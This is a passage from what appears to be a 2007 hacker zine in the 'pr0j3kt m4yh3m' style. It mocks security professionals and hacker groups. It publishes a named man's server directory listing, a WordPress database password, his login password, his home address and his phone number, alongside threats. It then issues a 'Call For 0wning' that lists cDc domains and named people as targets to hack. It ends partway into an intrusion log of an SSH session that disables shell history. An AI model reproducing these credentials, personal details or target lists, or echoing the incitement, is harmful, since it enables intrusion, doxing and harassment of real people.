the Phrack High Council have yet to be accomplished. This needs to change.
Instead of chatting on IRC all day, go out and own a whitehat. Do a PHC mission.
Contribute to pr0j3kt m4yh3m.
The recent events revolving around the blogger known as "InfoSec Sellout"
bring an interesting point to light. When the older "security professionals"
discovered the "fact" that InfoSec Sellout was LMH and was backed by PHC, it
caused quite a stir for those that remembered the heyday of the pr0j3kt. For
the whitehats that had just entered the industry post-whitehat holocaust, it
didn't mean a thing. They simply assumed (like 90% of the HTS userbase) that
PHC was/is a group of dissatisfied script kiddies. Too bad all the evidence
points to the contrary. Another sad fact is that whitehats have not only
taken over the public side of the scene, but the private side as well. These
"revelations" about InfoSec Sellout at one time would have come from an
anonymous post to FD, from a member of the underground. Now they come from a
"respected security professional". Instead of talking about the activities of
real hackers, the gossip reels these days deal with the exploits of whitehats
like David Maynor, HD Moore and others. Is this what we've allowed the scene to
become? A bunch of idlers thinking about fat middle aged whitehats? Where's the
rage? Where's the dedication to the eradication of the greedy security
consultants? Where's all the activity that was prevalent in the scene until
recently?
A time has come for a change. Follow the example dikline set out. Take back the
scene! Go out and actually hack. Don't post exploits to FD; post a whitehat's
spools! Continue the legacy of the glorious pr0j3kt m4yh3m!
Never sell out, never surrender.
EOSCENE
);}
sub Bambenek { ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; my $self = shift; own($self, <<'EOBAMBENEK'
John Bambenek is the Assistant Politics Editor for BC Magazine and is an
academic professional for the University of Illinois. By trade, he is an
information security professional, part of the Internet Storm Center and a
courseware author and certification grader for the GIAC family of security
certifications. He is a syndicated columnist who blogs at Part-Time Pundit
and the executive director of The Tumaini Foundation which helps AIDS
orphans and other children in Tanzania to get an education.
John Bambenek is a man of many trades: An assistant politics editor; an
academic "professional" for the university of Illinois; an information
security "specialist"; author and grader of the GIAC security certs. He
also loves to blog bullshit.
Despite his background charity work, the internet does not make exceptions
- speaking out of turn will get you owned.
Bambenek loves blogging so much he has four, yes four, blogs (
www.bloggernews.net, www.mensdailynews.com, thewideawakes.org and his site
www.parttimepundit.com ).
Now you may be wondering what it is Bambenek has done wrong. Well, despite
being a self-loving whitehat(burn) and talking more shit than a cess pit
with a mouth, it wasn't either of these reasons that forced us into
action.
This guy actually insulted us personally. I assume all of you have read
P64 and probably enjoyed it (if you saw past the typos, but I won't
mention that here). If you're reading this, John, it should be coming
clear now shouldn't it?
I'd like to point you all to
http://blogcritics.org/archives/2007/06/05/183157.php
This is Bambenek's review of P64 - I think he probably believes he has
some authority to speak about the "underground" because of his security
certifications and time at ISS. Well John, you are either the dumb piece
of shit we think you are, or you like being rm'd and having your emails
read. Lets take a peak at the review.
##Quote 1##
"As an information security professional, lately I've become quite bored.
The state of hacking today seems to be almost solely employed by the
spammer-class of miscreants looking to make as much money as quickly as
possible. It's big business now. As such, they continue to exploit the
same weaknesses, again and again, and simply lack the spirit and ingenuity
of previous generations of hackers."
## I bet the first five words of most of your security related blogs begin
that way don't they? Same old whitehat drivel. I can also assure you John,
we aren't all trying to sell our exploits on wslabi, and to be honest John,
you spam more shit than anyone. Four blogs? All mirroring the same
bullshit?
##Quote 2##
"Hacking has been commoditized. With spammers running the show whose
bottom-line is money, information security threats have become
quantifiable, systemitizable, and predictable. Occasionally there are some
really neat new security hacks, the WMF exploit and the ANI exploit come
to mind, but by and large, it's the same old stupid tricks done and
redone. This is because they continue to exploit the weakest link, the
unsophisticated PC user who will still fall prey to 419 scams after all
these years. Upwards of 80% of people will click on phishing e-mails if
the message looks "good" enough, such as through a social networking site.
Any idiot can own hardware now⦠and they do. It's quantity over
quality."
## Generalising. Did you predict this attack? As a side note, you have
only discovered one public bug (harvesting bugs for wslabi?), you lack
skill John. I don't even know how you can consider yourself a security
professional.
##Quote 3##
"At the same time, many of the old school hacker groups have sold out.
Instead of continuing to work on their craft, they've gone to work for the
highest bidder. As a result, the old hacking vitality has been lost."
## Yes, all our exploits belong to wslabi. You know nothing about hacking
dude (quit monitoring SANS stats, might get you somewhere), this article
will totally discredit you in the security industry and deservedly so. We
respect your right to blog, but this next quote really took it too far,
especially in terms of lolz.
##Quote 4##
"I wouldn't be doing the job I do if it weren't for hacking; the problem
is that you're boring the hell out of me."
## Wait, we're boring you? Dude even with your mail spools combined, you
are much...much more boring than anyone or anything, and that includes FD
mailing list.
##Quote 5##
"I have some sympathy for their underground and anti-authority tendencies,
though I've not participated in the underground."
## Lies. Bambenek == Maynor == LMH == Infosec sellout. Fuck your sympathy
dude, good luck with your perfect life, I should throw Tyler Durden quotes
at you. 30 years old and never had a woman :/
##Quote 6##
âThe reason there is often a delay is that a lot of the people who
actually install a lot of these keylogger programs are not that
sophisticated, Bambenek said. In most cases, they're teenage
hackers who flip the information to more organized criminal groups for
some quick cash.â
## Yeah man, fuck those keyloggers!?! 0day can happen to anyone...but more
likely the retarded (Copyright Raven 2007)
##Quote 7##
"I was in a Washington Post article today in which I basically was quoted
calling all the online credit card thiefs n00bs. Iâm starting a pool,
how long til they DoS meâ¦"
## Typical whitehat response, we are probably script kiddies because we
owned you. The truth is dude, you are the n00b here (see below for
password l0lz). And as for DoS? meh, no one visits your site.
Anyway, I guess its time to drop some d0x :D
# ls -la /home/john1/public_html
total 276
drwxr-x--- 24 john1 nobody 4096 May 29 11:58 .
drwx--x--x 29 john1 john1 4096 Jul 30 10:49 ..
-rwxr-xr-x 1 john1 john1 0 Nov 26 2002 404.shtml
-rw-r--r-- 1 john1 john1 2558 May 4 2005 about.php
-rw-r--r-- 1 john1 john1 1845 Sep 7 2006 adsense.html
-rwxr-xr-x 1 john1 john1 2327 Dec 29 2003 atroot.php
drwxr-xr-x 3 john1 john1 4096 Jun 4 00:17 bambenek
drwxr-xr-x 3 john1 john1 4096 Jul 28 2006 cgi-bin
-rw-r--r-- 1 john1 john1 58767 Jan 12 2006 client.htm
-rw-r--r-- 1 john1 john1 233 Aug 14 2006 contact.php
drwxr-xr-x 4 john1 john1 4096 Dec 20 2005 cpm
-rwxr-xr-x 1 john1 john1 18204 Mar 12 2004 diediedie
drwxrwxrwx 3 john1 john1 4096 Dec 20 2005 document_repository.old
-rw-r--r-- 1 john1 john1 5305 Aug 14 2006 footer.php
-rw-r--r-- 1 john1 john1 2993 May 4 2005 header.php
-rw-r--r-- 1 john1 john1 0 Dec 24 2006 .htaccess
-rwxr-xr-x 1 john1 john1 0 Oct 4 2002 .htaccess.1033756819
-rwxr-xr-x 1 john1 john1 0 Aug 11 2003 .htaccess.1060623240
-rwxr-xr-x 1 john1 john1 355 Aug 12 2003 .htaccess.1060726978
-rwxr-xr-x 1 john1 john1 525 Dec 21 2006 .htaccess-20061221
drwxr-xr-x 3 john1 john1 4096 Dec 20 2005 images
-rwxr-xr-x 1 john1 john1 15655 Jan 28 2004 index.html.old
-rw-r--r-- 1 john1 john1 4773 Aug 14 2006 index.php
drwxr-xr-x 3 john1 john1 4096 Jul 28 2006 infosec #h8
drwxr-xr-x 13 john1 john1 4096 Jun 12 07:36 jcb
drwxr-xr-x 2 john1 root 4096 May 28 13:52 jcb.dos
drwxrwxrwx 2 john1 john1 4096 Dec 20 2005 L10.old
-rw-r--r-- 1 john1 john1 692 May 4 2005 links.html
drwxr-xr-x 4 john1 john1 4096 Jun 11 21:05 mim
drwxr-xr-x 17 john1 john1 4096 May 31 22:03 mt
drwxr-xr-x 4 john1 john1 4096 May 12 20:46 newsletter
drwxr--r-- 3 john1 john1 4096 Dec 20 2005 old
drwxr-xr-x 2 john1 john1 4096 Dec 20 2005 old_web
drwxr-xr-x 3 john1 john1 4096 Dec 20 2005 opcenter
drwxr-xr-x 6 john1 john1 4096 Dec 20 2005 opendocman.olc
drwxr-xr-x 2 john1 john1 4096 Dec 20 2005 _private
drwxr-xr-x 3 john1 john1 4096 May 21 2006 pundits
-rw-r--r-- 1 john1 john1 0 Aug 14 2006 robots.txt
-rw-r--r-- 1 john1 john1 1427 Apr 26 2005 security.php
-rw-r--r-- 1 john1 john1 1951 Apr 25 2005 server.php
drwxr-xr-x 2 john1 john1 4096 May 22 04:47 suspended.page
drwxr-xr-x 3 john1 john1 4096 Jul 28 2006 techblog
-rw-r--r-- 1 john1 john1 561 Apr 26 2005 thanks.php
drwxr-xr-x 14 john1 john1 4096 May 19 22:04 tumaini
drwxr-xr-x 5 john1 john1 4096 Aug 6 2006 tumaini.old
-rw-r--r-- 1 john1 john1 6656 Dec 17 2006 wiki.txt
##writing your own wiki sux
/home/john1/public_html/jcb:
total 6252
drwxr-xr-x 13 john1 john1 4096 Jun 12 07:36 .
drwxr-x--- 24 john1 nobody 4096 May 29 11:58 ..
-rw-r--r-- 1 john1 john1 10553 May 27 2004 07-minister.jpg
-rw-r--r-- 1 john1 john1 20176 Sep 1 2006 abort.jpg
-rw-r--r-- 1 john1 john1 42 Feb 1 11:15 ac.html
-rw-r--r-- 1 john1 john1 9786 Aug 27 2005 addesign1.gif
-rw-r--r-- 1 john1 john1 11048 Aug 27 2005 addesign2.gif
-rw-r--r-- 1 john1 john1 7861 Aug 27 2005 addesign3.gif
-rw-r--r-- 1 john1 john1 131249 Dec 3 2006 agi.png
-rw-r--r-- 1 john1 john1 42 Apr 29 15:19 alexa.html
-rw-r--r-- 1 john1 john1 42 Apr 29 15:19 amazon.html
drwxr-xr-x 61 john1 john1 4096 Aug 18 2006 archives
-rw-rw-rw- 1 john1 john1 92668 Aug 18 2006 archives.html
-rw-rw-rw- 1 john1 john1 86298 Jul 30 11:15 atom.xml
-rw-r--r-- 1 john1 john1 1714 Aug 27 2005 bah.gif
-rw-r--r-- 1 john1 john1 9703 Aug 27 2005 banner10.gif
-rw-r--r-- 1 john1 john1 97388 Aug 27 2005 banner11.gif
-rw-r--r-- 1 john1 john1 14805 Aug 29 2006 bannertest.html
-rw-r--r-- 1 john1 john1 42 Feb 9 2000 bc.gif
-rw-r--r-- 1 john1 john1 42 Jan 26 2006 bc.html
-rw-r--r-- 1 john1 john1 18439 Mar 20 2006 blogMadBlue.gif
-rw-r--r-- 1 john1 john1 42 Jan 13 2006 bnn.gif
-rw-r--r-- 1 john1 john1 42 Jan 26 2006 bnn.html
-rw-r--r-- 1 john1 john1 141505 Aug 27 2005 botv.gif
-rw-r--r-- 1 john1 john1 2562 Aug 23 2006 br-staclu.html
-rw-r--r-- 1 john1 john1 9111 Jan 22 2006 cash2.gif
-rw-r--r-- 1 john1 john1 6622 Jan 22 2006 cash.gif
-rw-r--r-- 1 john1 john1 22266 Aug 27 2005 cfr.gif
drwxr-xr-x 2 john1 john1 4096 Aug 27 2005 cgi-bin
-rw-r--r-- 1 john1 john1 2825 Aug 23 2006 clock.jpg
-rw-r--r-- 1 john1 john1 9707 Aug 27 2005 coalition_1.gif
-rw-r--r-- 1 john1 john1 6519 Jan 3 2007 coulter.txt
-rw-r--r-- 1 john1 john1 13106 Mar 9 17:38 dailyshow.jpg
-rw-r--r-- 1 john1 john1 11255 Nov 8 2006 dijcb.gif
-rw-r--r-- 1 john1 john1 16 Feb 3 12:26 dirzap.com.txt
-rw-r--r-- 1 john1 nobody 4212 Nov 22 2006 error_log
-rw-r--r-- 1 john1 john1 359 Aug 23 2006 fantastico_fileslist.txt
-rw-r--r-- 1 john1 john1 36 Aug 23 2006 fantversion.php
-rw-r--r-- 1 john1 john1 2408 Nov 27 2006 fem-tshirt.txt
-rw-r--r-- 1 john1 john1 5274 May 4 14:50 france.txt
-rw-r--r-- 1 john1 john1 336903 Jan 1 2005 freegas.jpg
-rw-r--r-- 1 john1 john1 42 Jan 13 2006 freep.gif
-rw-r--r-- 1 john1 john1 42 Jan 26 2006 freep.html
-rw------- 1 john1 john1 15 Jul 23 05:00 .ftpquota
-rw-r--r-- 1 john1 john1 0 Jan 27 2007 google4247998986f13f3e.html
-rw-r--r-- 1 john1 john1 22773 Jun 11 21:09 gov1.jpg
-rw-r--r-- 1 john1 john1 11918 Aug 27 2005 greenzapbanner.gif
-rw-r--r-- 1 john1 john1 170 Dec 21 2006 .htaccess
-rw-r--r-- 1 john1 john1 1502 Dec 21 2006 .htaccess.old
-rw-r--r-- 1 john1 john1 0 Dec 19 2006 iapc.html
drwxrwxrwx 3 john1 john1 4096 Dec 20 2005 images
-rw-r--r-- 1 john1 john1 146093 Apr 6 2006 immig.gif
-rw-rw-rw- 1 john1 john1 23664 Aug 20 2006 index2.php
-rw-rw-rw- 1 john1 john1 81702 Aug 18 2006 index.html.old
-rw-rw-rw- 1 john1 john1 81702 Mar 8 11:37 index.html.old2
-rw-r--r-- 1 john1 john1 94 May 19 21:53 index.php
-rw-rw-rw- 1 john1 john1 86298 Jul 30 11:15 index.rdf
-rw-r--r-- 1 john1 john1 81702 Aug 20 2006 index-test.html
-rw-rw-rw- 1 john1 john1 86298 Jul 30 11:15 index.xml
-rw-r--r-- 1 john1 john1 363 Sep 2 2006 info.txt
-rwxr--r-- 1 john1 john1 44121 Aug 27 2005 IntlLawFinal.pdf
-rw-r--r-- 1 john1 john1 42 Aug 3 2006 ir.html
-rw-r--r-- 1 john1 john1 404 Aug 27 2005 jcb4scotus.gif
-rw-r--r-- 1 john1 john1 4163 Aug 27 2005 jcb.jpg
-rw-r--r-- 1 john1 john1 817087 May 19 21:53 latest.tar.gz
-rw-r--r-- 1 john1 john1 15127 May 19 21:53 license.txt
-rwxr--r-- 1 john1 john1 10999 Aug 27 2005 macosx.html
drwxr-xr-x 2 john1 john1 4096 Dec 8 2005 maillist
-rw-r--r-- 1 john1 john1 11216 Aug 27 2005 milblogs0.jpg
-rw-r--r-- 1 john1 john1 42 Aug 2 2006 mnd.html
lrwxrwxrwx 1 john1 john1 5 Dec 20 2005 mt -> ../mt
-rw-r--r-- 1 john1 john1 20681 Aug 27 2005 mt.old.cfg
-rw-rw-rw- 1 john1 john1 137 Aug 27 2005 mtview.php
-rw-r--r-- 1 john1 john1 2137 Nov 28 2006 nativity-ad.jpg
-rw-r--r-- 1 john1 john1 91 Aug 27 2005 nav-commenters.gif
-rw-r--r-- 1 john1 john1 129633 Jan 4 2005 nccod1.jpg
-rw-r--r-- 1 john1 john1 110047 Jan 4 2005 nccod2.jpg
-rw-r--r-- 1 john1 john1 122711 Jan 4 2005 nccod3.jpg
-rw-r--r-- 1 john1 john1 121305 Jan 4 2005 nccod4.jpg
-rw-r--r-- 1 john1 john1 115635 Jan 4 2005 nccod5.jpg
-rw-r--r-- 1 john1 john1 151873 Jan 4 2005 nccod6.jpg
drwxr-xr-x 3 john1 john1 4096 Dec 28 2006 newsletter
drwxr-xr-x 2 john1 john1 4096 Dec 20 2005 papers
-rw-r--r-- 1 john1 john1 378 Aug 23 2006 pers-br.php
-rw-r--r-- 1 john1 john1 42 Jan 13 2006 plb.gif
-rw-r--r-- 1 john1 john1 42 Sep 1 2006 plb.html
drwxrwxrwx 4 john1 john1 4096 Nov 11 2006 podpress_trac
-rw-r--r-- 1 john1 john1 95705 May 30 2006 portfolio.pdf
-rw-r--r-- 1 john1 john1 1435 Aug 27 2005 prolifeblogs.gif
-rw-r--r-- 1 john1 john1 7631 May 19 21:53 readme.html
-rw-r--r-- 1 john1 john1 72 Jun 3 23:10 referrals.html
-rwxr--r-- 1 john1 john1 84598 Aug 27 2005 resume-m.pdf
-rw-rw-rw- 1 john1 john1 22115 Aug 18 2006 right.html
-rw-r--r-- 1 john1 john1 0 Aug 14 2006 robots.txt
-rw-rw-rw- 1 john1 john1 496 Jul 28 2006 rsd.xml
-rw-r--r-- 1 john1 john1 64408 Sep 6 2006 rvj.jpg
-rw-r--r-- 1 john1 john1 753664 Sep 6 2006 rvj.png
-rw-rw-rw- 1 john1 john1 81510 Aug 18 2006 rwbsite.php
-rw-rw-rw- 1 john1 john1 1384 Sep 17 2005 rwb-styles.css
-rwxr--r-- 1 john1 john1 452782 Aug 27 2005 sco.png
-rw-r--r-- 1 john1 john1 7331 Aug 27 2005 scotus.gif
-rw-rw-rw- 1 john1 john1 23664 Aug 20 2006 sidebar.html
-rwxr-xr-x 1 nobody john1 198166 Jul 29 18:46 sitemap.xml
-rw-r--r-- 1 nobody john1 12712 Jul 29 18:46 sitemap.xml.gz
-rwxr--r-- 1 john1 john1 6794 Aug 27 2005 solcd.html
-rw-r--r-- 1 john1 john1 42 Jan 13 2006 staclu.gif
-rw-r--r-- 1 john1 john1 42 Jan 26 2006 staclu.html
-rw-r--r-- 1 john1 john1 12509 Aug 27 2005 stem.jpg
-rw-r--r-- 1 john1 john1 378 Aug 23 2006 stop2.php
-rw-r--r-- 1 john1 john1 193 Aug 23 2006 stop-br.html
-rw-r--r-- 1 john1 john1 3649 Aug 27 2005 styles-site.css
-rw-r--r-- 1 john1 john1 61571 Jan 1 2005 sunswag.jpg
-rw-r--r-- 1 john1 root 1603 Jul 7 2006 tagblitz.gif
-rw-r--r-- 1 john1 john1 65740 Jan 1 2005 tanz-pcs1.JPG
-rw-r--r-- 1 john1 john1 75289 Jan 1 2005 tanz-pcs2.JPG
drwxr-xr-x 2 john1 john1 4096 Nov 20 2006 templates_c
-rw-r--r-- 1 john1 john1 532 May 26 2006 test2.html
-rw-r--r-- 1 john1 john1 42 Jan 26 2006 test.html
-rw-r--r-- 1 john1 john1 42 Jan 5 2007 th.html
-rw-r--r-- 1 john1 john1 56520 Nov 29 2006 tumaini-di.jpg
-rw-r--r-- 1 john1 john1 3569 Aug 27 2005 tw4s.html
-rw-r--r-- 1 john1 john1 42 Jan 13 2006 twa.gif
-rw-r--r-- 1 john1 john1 42 Jan 26 2006 twa.html
-rw-r--r-- 1 john1 john1 163747 Nov 7 2006 vote.jpg
-rw-r--r-- 1 john1 john1 12719 Nov 22 2005 vp-1a.jpg
-rw-r--r-- 1 john1 john1 48166 Nov 22 2005 vp-2a.jpg
-rw-r--r-- 1 john1 john1 42 Aug 17 2006 war.html
-rw-r--r-- 1 john1 john1 42 Feb 7 15:58 wikia.html
-rw-r--r-- 1 john1 john1 11543 Jan 19 2006 wot.gif
drwxr-xr-x 4 john1 john1 4096 May 19 21:53 wp-admin
-rw-r--r-- 1 john1 john1 36179 May 19 21:53 wp-app.php
-rw-r--r-- 1 john1 john1 127 May 19 21:53 wp-atom.php
-rw-r--r-- 1 john1 john1 997 May 19 21:53 wp-blog-header.php
-rw-r--r-- 1 john1 john1 2905 May 19 21:53 wp-comments-post.php
-rw-r--r-- 1 john1 john1 151 May 19 21:53 wp-commentsrss2.php
-rw-r--r-- 1 john1 john1 925 May 28 14:41 wp-config.php
-rw-r--r-- 1 john1 john1 965 May 19 21:53 wp-config-sample.php
drwxr-xr-x 8 nobody john1 4096 May 29 11:41 wp-content
-rw-r--r-- 1 john1 john1 849 May 19 21:53 wp-cron.php
-rw-r--r-- 1 john1 john1 120 May 19 21:53 wp-feed.php
drwxr-xr-x 4 john1 john1 4096 May 19 21:53 wp-includes
-rw-r--r-- 1 john1 john1 1517 May 19 21:53 wp-links-opml.php
-rw-r--r-- 1 john1 john1 16022 May 19 21:53 wp-login.php
-rw-r--r-- 1 john1 john1 5674 May 19 21:53 wp-mail.php
-rw-r--r-- 1 john1 john1 291 May 19 21:53 wp-pass.php
-rw-r--r-- 1 john1 john1 188 May 19 21:53 wp-rdf.php
-rw-r--r-- 1 john1 john1 251 May 19 21:53 wp-register.php
-rw-r--r-- 1 john1 john1 127 May 19 21:53 wp-rss2.php
-rw-r--r-- 1 john1 john1 125 May 19 21:53 wp-rss.php
-rw-r--r-- 1 john1 john1 9278 May 19 21:53 wp-settings.php
-rw-r--r-- 1 john1 john1 3518 May 19 21:53 wp-trackback.php
-rw-r--r-- 1 john1 john1 55008 May 19 21:53 xmlrpc.php
-rw-r--r-- 1 john1 john1 42 Aug 28 2006 zimbio.html
-rw-r--r-- 1 john1 john1 42 Dec 19 2006 zzzz.html
// ** MySQL settings ** //
define('DB_NAME', 'john1_wrdp1'); // The name of the database
define('DB_USER', 'john1_wrdp1'); // Your MySQL username
define('DB_PASSWORD', 'oQUgk8DQWjco'); // ...and password
define('DB_HOST', 'localhost'); // 99% chance you won't need to change
this value
Other than that, not really anything worth noting, other than his shitty
self promoting news letters (Bambenek for president). John, any further
comment and you will be owned again.
Name:
John Bambenek
Mailing address:
715 Erin Dr
Phone number:
217-493-0760
And on a final note, I'd like to finish this article on a note that will
make everyone laugh (at John Bambenek). As a security consultant, you
really would think he'd know better. A seven letter password, a word found
in dictionaries, all lowercase, you find it on the beach? Similar to a
stone? Well if you can guess it you you too can own John Bambenek. wtf
kind of password is "pebbles"? If anyone employs you again to work in the
security industry they are cleary more stupid than you are. One other
thing, you are right, you wouldn't be in this job if it wasn't for hacking
- so quit fucking leeching from what we create or you will be owned again
and again.
Just another disgruntled teenager trying to be nostalgic for a long passed
era which I never even participated in. This relevant enough for you?
cya John.
EOBAMBENEK
);}
sub CF0 { ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; my $self = shift; say($self, <<'EOCF0'
== Call For 0wning ==
Same deal as before. Own whoever you can and report it to us for elite
prizes! Or just respect.
== Results ==
I think it is fair to say that our first CF0 was a complete and utter
rags-to-riches success story. Despite drawbacks (hakspace getting defaced
and removed, every other site being redone) we still 0wned everything to
do with psg. Our one sadness is that not one external group responded to
our call, unless one of the many people owning psg was inspired by us and
simply declined to contact us. We expect more this time.
"In the End, we will remember not the words of our enemies, but the
silence of our friends."
- Martin Luther King Jr.
== New Target: The Cult of the Dead Cow ==
The cDc are a group of media-focused attention-grabbing fucktards.
These guys produce shitty content and then market it as if it means
something.
Sound familiar? Most definitely. They're awfully like psg, our last
victim. In fact, they are so much like psg that they invited psg to be a
member of their "Ninja Strike Force" wanksquad.
The variety of cDc websites and content is simply designed to confuse you
into thinking that they do something.
In reality, all the cDc does is try to convince the world that they are a
very important, top-of-the-world, hacking group.
Let's start at the top. The cDc leader, Ratte', is a piece of noob. Yes,
he has known how to type for decades. But what has he learned in that time
huddling over his keyboard? Fuck all. Check out his Phrack profile. He
was 14 when he started cDc. For years it was just a group that published
dreadful and creative (read: non-technical) text files. Now they do that,
plus audio and image files.
You know how cDc tries to sell the image that it has been the shit in the
hacker community since 1984? Yes, well, that's complete bullshit. And
Ratte' knows it:
"But what makes CULT OF THE DEAD COW different and has enabled us to last
is that cDc has never been about technology" <- so stop calling
yourselves hackers to gain hits, fuckers.
From 1984 until something like 1998 they did hardly anything except write
these shitty articles, recruit new members, and suck some media cock.
This is the one exception: in the early 1990s they ran hohocon. hohocon
had very limited amounts of technical content, and it wasn't supplied by
cDc. Think of it as a bunch of fat losers getting together to bumfuck each
other.
What you need to understand is that Ratte' is basically an emo loser who
blogged for twenty years.
Over time he has recruited other media cock suckers, most of which have
only lasted a few years. Fools that they are, their most popular work will
forever be what they released with cDc, and it will be considered made by
cDc, with them mentioned only as an afterthought. Not coincidentally, the
reason their shitty work was popular to begin with was because it was
released by cDc.
"I think with our longevity we've worked towards finding a new way to
relate to technology and the emerging global structure." <- you mean
you have worked towards recruiting new members who at least know how to
use some new technology.
What is the one bona-fide highlight of cDc's technical career? It was when
they wrote Back Orifice and Back Orifice 2000 and spoke at two Defcons
about them. Congratulations, you wrote a shitty backdoor for Windows 95/98
(not like 98 was a big technical advancement over 95) years after win95
had been released. According to ISS, they used a two byte encryption key
(http://xforce.iss.net/xforce/alerts/id/advise5) with a known plaintext.
Seriously, why not just rot13 it? Stupid wankers. Apparently cDc losers
continue to implement encryption poorly.
Yet BO was quite popular. All because cDc talked it up. Real hackers were
writing much better backdoors, trivially, and keeping them to themselves.
Real hackers actually had backdoors that weren't designed for grandma's
PC. And Defcon supported cDc in their bullshit game. BO was cDc's way of
saying "look ma, we got a couple new members who know this programming
thing. we're still relevant!" The other programs by cDc since then have
been just as shitty. Bollocks I say.
cDc has never, ever, produced anything good.
The combined technical production of all cDc members, ever, during their
time at cDc, is easily comparable to a year's worth of work by a small
"script kiddie" group, despite all the time that kiddie group would have
invested actually hacking.
cDc also has this hacktivismo thing, which is also a piece of shit that
hasn't accomplished anything. But it sure has produced a lot of rhetoric,
adding more shit to the fan, and has a few members whose names can be
added to the cDc shitlist.
They have a "ninja strike force", which is just another bullshit name for
cDc members. See, cDc wants to throw a bunch of names at you, like cDc,
cDc communications, ninja strike force, and hacktivismo, to make it look
like they are involved in a lot of stuff.
Now of all things they have integrated psg. They get to use him as a wank
vehicle to spread their name. He does likewise. It's a gay publicity fest.
psg gets to talk about Eve (lame Whitedust program) on the NSF blog,
despite the fact that he didn't write it. Literally using cDc to sell a
product that nobody in cDc made.
These guys spend their days forming myspace blog posts. It is a bloody
group of myspace users who tell the world that they are one of the oldest
hacking groups, and use the number 1984 as their evidence.
Please start owning cDc assets or individuals. We want cDc to just end.
They are worse than 2600 (and we would probably write a CF0 on 2600 if we
hadn't owned them so much already).
== Targets ==
Some domains to own:
cultdeadcow.com
hacktivismo.com
ninjastrikeforce.com
bo2k.com
http://www.cultdeadcow.com/?p=proj # Good list to work on!
http://www.cultdeadcow.com/?p=other # Another list to work on!
Here is an incomplete list of people to own (gathered from cDc websites
for your convenience):
(here be older members)
Grandmaster Ratte'
Obscure Images
THE NIGHTSTALKER - gis.net/~cht
Count Zero - zero.hastypasty.net
Mudge
Oxblood Ruffin - oxblood.net
Sir Dystic
Dildog
Dark Sorcerer
(here be the blogging crew)
Myles Long - http://www.rezident.net/~myles/
xxxclusive - http://the3rd2nd.com/
Hella Kitty
assrabbit
Javaman - http://www.philtered.net/~adam/
Mixter - mixter.void.ru
Lord Digital - http://www.phantom.com/~digital/
MiB
Delchi
el - http://el.blogsport.de/
Punkle Jones
trammel
ladyaya
valsmith - offensivecomputing.net
dannyquist
Comrade Smack
(here be current NSF bitches not listed above)
psg
DaYuM
Devolish
Diskrez
Elliot Pank
Flack
fj
KEMiKAL
Lizzie Borden
Omnininja
oxycolton
Phrenchtoast
RaD Man
Voice Of Anarchy
Biot
Binary
Chamuco
(here be others)
anyone on IRC
anyone on their forums
I excluded a few older members. I get the feeling that they knew how lame
it was, and have moved on. Ratte' just finds it convenient to use their
names to try to support his credibility. But we don't really know them, so
do what you would like.
There are lots of reasons to own any of these individuals. Many are
morons. Many have never accomplished anything. The few who have written
code for cDc have done so poorly. Some are whitehat scenewhores. If you
can't decide, how about we offer suggestions:
Ratte' - Start at the top and own this noob. He knows what he is, but he
won't stop lying.
Mixter - The current "Look, we have a real hacker!" member. See his
Wikipedia entry!
Comrade Smack - The current "I'm fresh and exciting!" member.
psg - why not?
== Motivation Time ==
I hear a lot of rhetoric about taking back the scene. Taking it back from
no-talent whitehats. And I'm all for that - we even did some of that in
this zine. But come on, nobody is claiming such a big piece of the hacker
history cake as cDc is. You want to take back the scene? Well, do it. Wipe
these fuckers off the internet. It's easy and it can be seen by far more
people than someone reading a zine or someone who notices a whitehat blog
disappear.
There are more than enough targets to go around. So pick one and fucking
0wn it.
Here is a motivational quote from some friends of ours:
Blend in. Get trusted.
Trust nobody. Own everybody.
Disclose nothing. Destroy everything.
Take back the scene.
EOCF0
);}
sub Hellboundhackers { ;;;;;;;;;;;;;;;;;;;;;;;;; my $self = shift; own($self, <<'EOHELLBOUNDHACKERS'
There comes a time for every civilization to come to an end. That end could be
a series of violent conflicts that come in waves, or a slow sputtering out
of interest until it's effectively dead. Occasionally, a community that's slow
to realize that it's out-modded, out-dated, out-gunned and out-classed has to
be helped along to its eventual demise.
Such was the case for HellBoundHackers (HBH). HBH is your typical lamer site.
They have a forum with over 20,000 registered users, lots of stupid articles
that are pointless and don't convey any new information. They also have your
typical administrators that think themselves to be elite hackers. In this case,
despite the name, they're staunchly whitehat advocating "ethical" hacking.
However, MrCheese and his posse also regard themselves as hacktivists and the
self proclaimed saviours of the Internet. They hack websites whose content they
disagree with and post a defacement. Hmm... does anyone else see the
contradiction here?
They also advocate practices such as full-disclosure, and yet they claim to
hate script kiddies. All their "hacking" articles always talk about how you
should code your own exploits. Too bad none of their members has a clue about
how to do that.
The members over on HBH also have the typical narrow whitehat perspective.
Anyone who actually hacks is a script kiddie, regardless of their actual skill
level. This should come as a shock to them...
So, in accordance with the rules of pr0j3kt m4yh3m, it has been decided that
HBH needs to die. This comes for all communities; it is inevitable. You can
try to fight it but you will lose. After all, you don't know us, you only know
of us.
And as Raster so bravley said:
08:22 <~ShiroTenryu> I dare you all, hack my network, so you can prove a point!
We'll take that dare Raster. Now, let's take a look at their IRC network:
$ ssh -p 443 deadlyacid@rasterized.net
deadlyacid@rasterized.net's password:
Last login: Fri Apr 20 14:15:58 2007 from Z.F.0
[deadlyacid@localhost ~]$ unset HISTFILE ; unset SAVEHIST
[deadlyacid@localhost ~]$ uname -a
Linux localhost.localdomain 2.6.20 #1 Mon May 21 23:20:40 EDT 2007 i686 i686 i386 GNU/Linux
[deadlyacid@localhost ~]$ cat /etc/redhat-release
Fedora Core release 4 (Stentz)
[deadlyacid@localhost ~]$ w
17:10:16 up 3 days, 21:39, 1 user, load average: 0.02, 0.02, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
deadlyac pts/0 Z.F.0 17:09 0.00s 0.03s 0.00s w
[deadlyacid@localhost ~]$ # how boring...
[deadlyacid@localhost ~]$ ls -alh
total 48K
drwxr-xr-x 2 deadlyacid deadlyacid 4.0K Apr 7 21:52 .
drwxr-xr-x 26 strayfe strayfe 4.0K May 14 04:32 ..
-rw------- 1 deadlyacid deadlyacid 2 Apr 7 21:55 .bash_history
-rw-r--r-- 1 deadlyacid deadlyacid 24 Sep 13 2006 .bash_logout
-rw-r--r-- 1 deadlyacid deadlyacid 191 Sep 13 2006 .bash_profile
-rw-r--r-- 1 deadlyacid deadlyacid 124 Sep 13 2006 .bashrc
-rwsr-xr-x 1 root root 4.8K Sep 13 2006 .cshrc
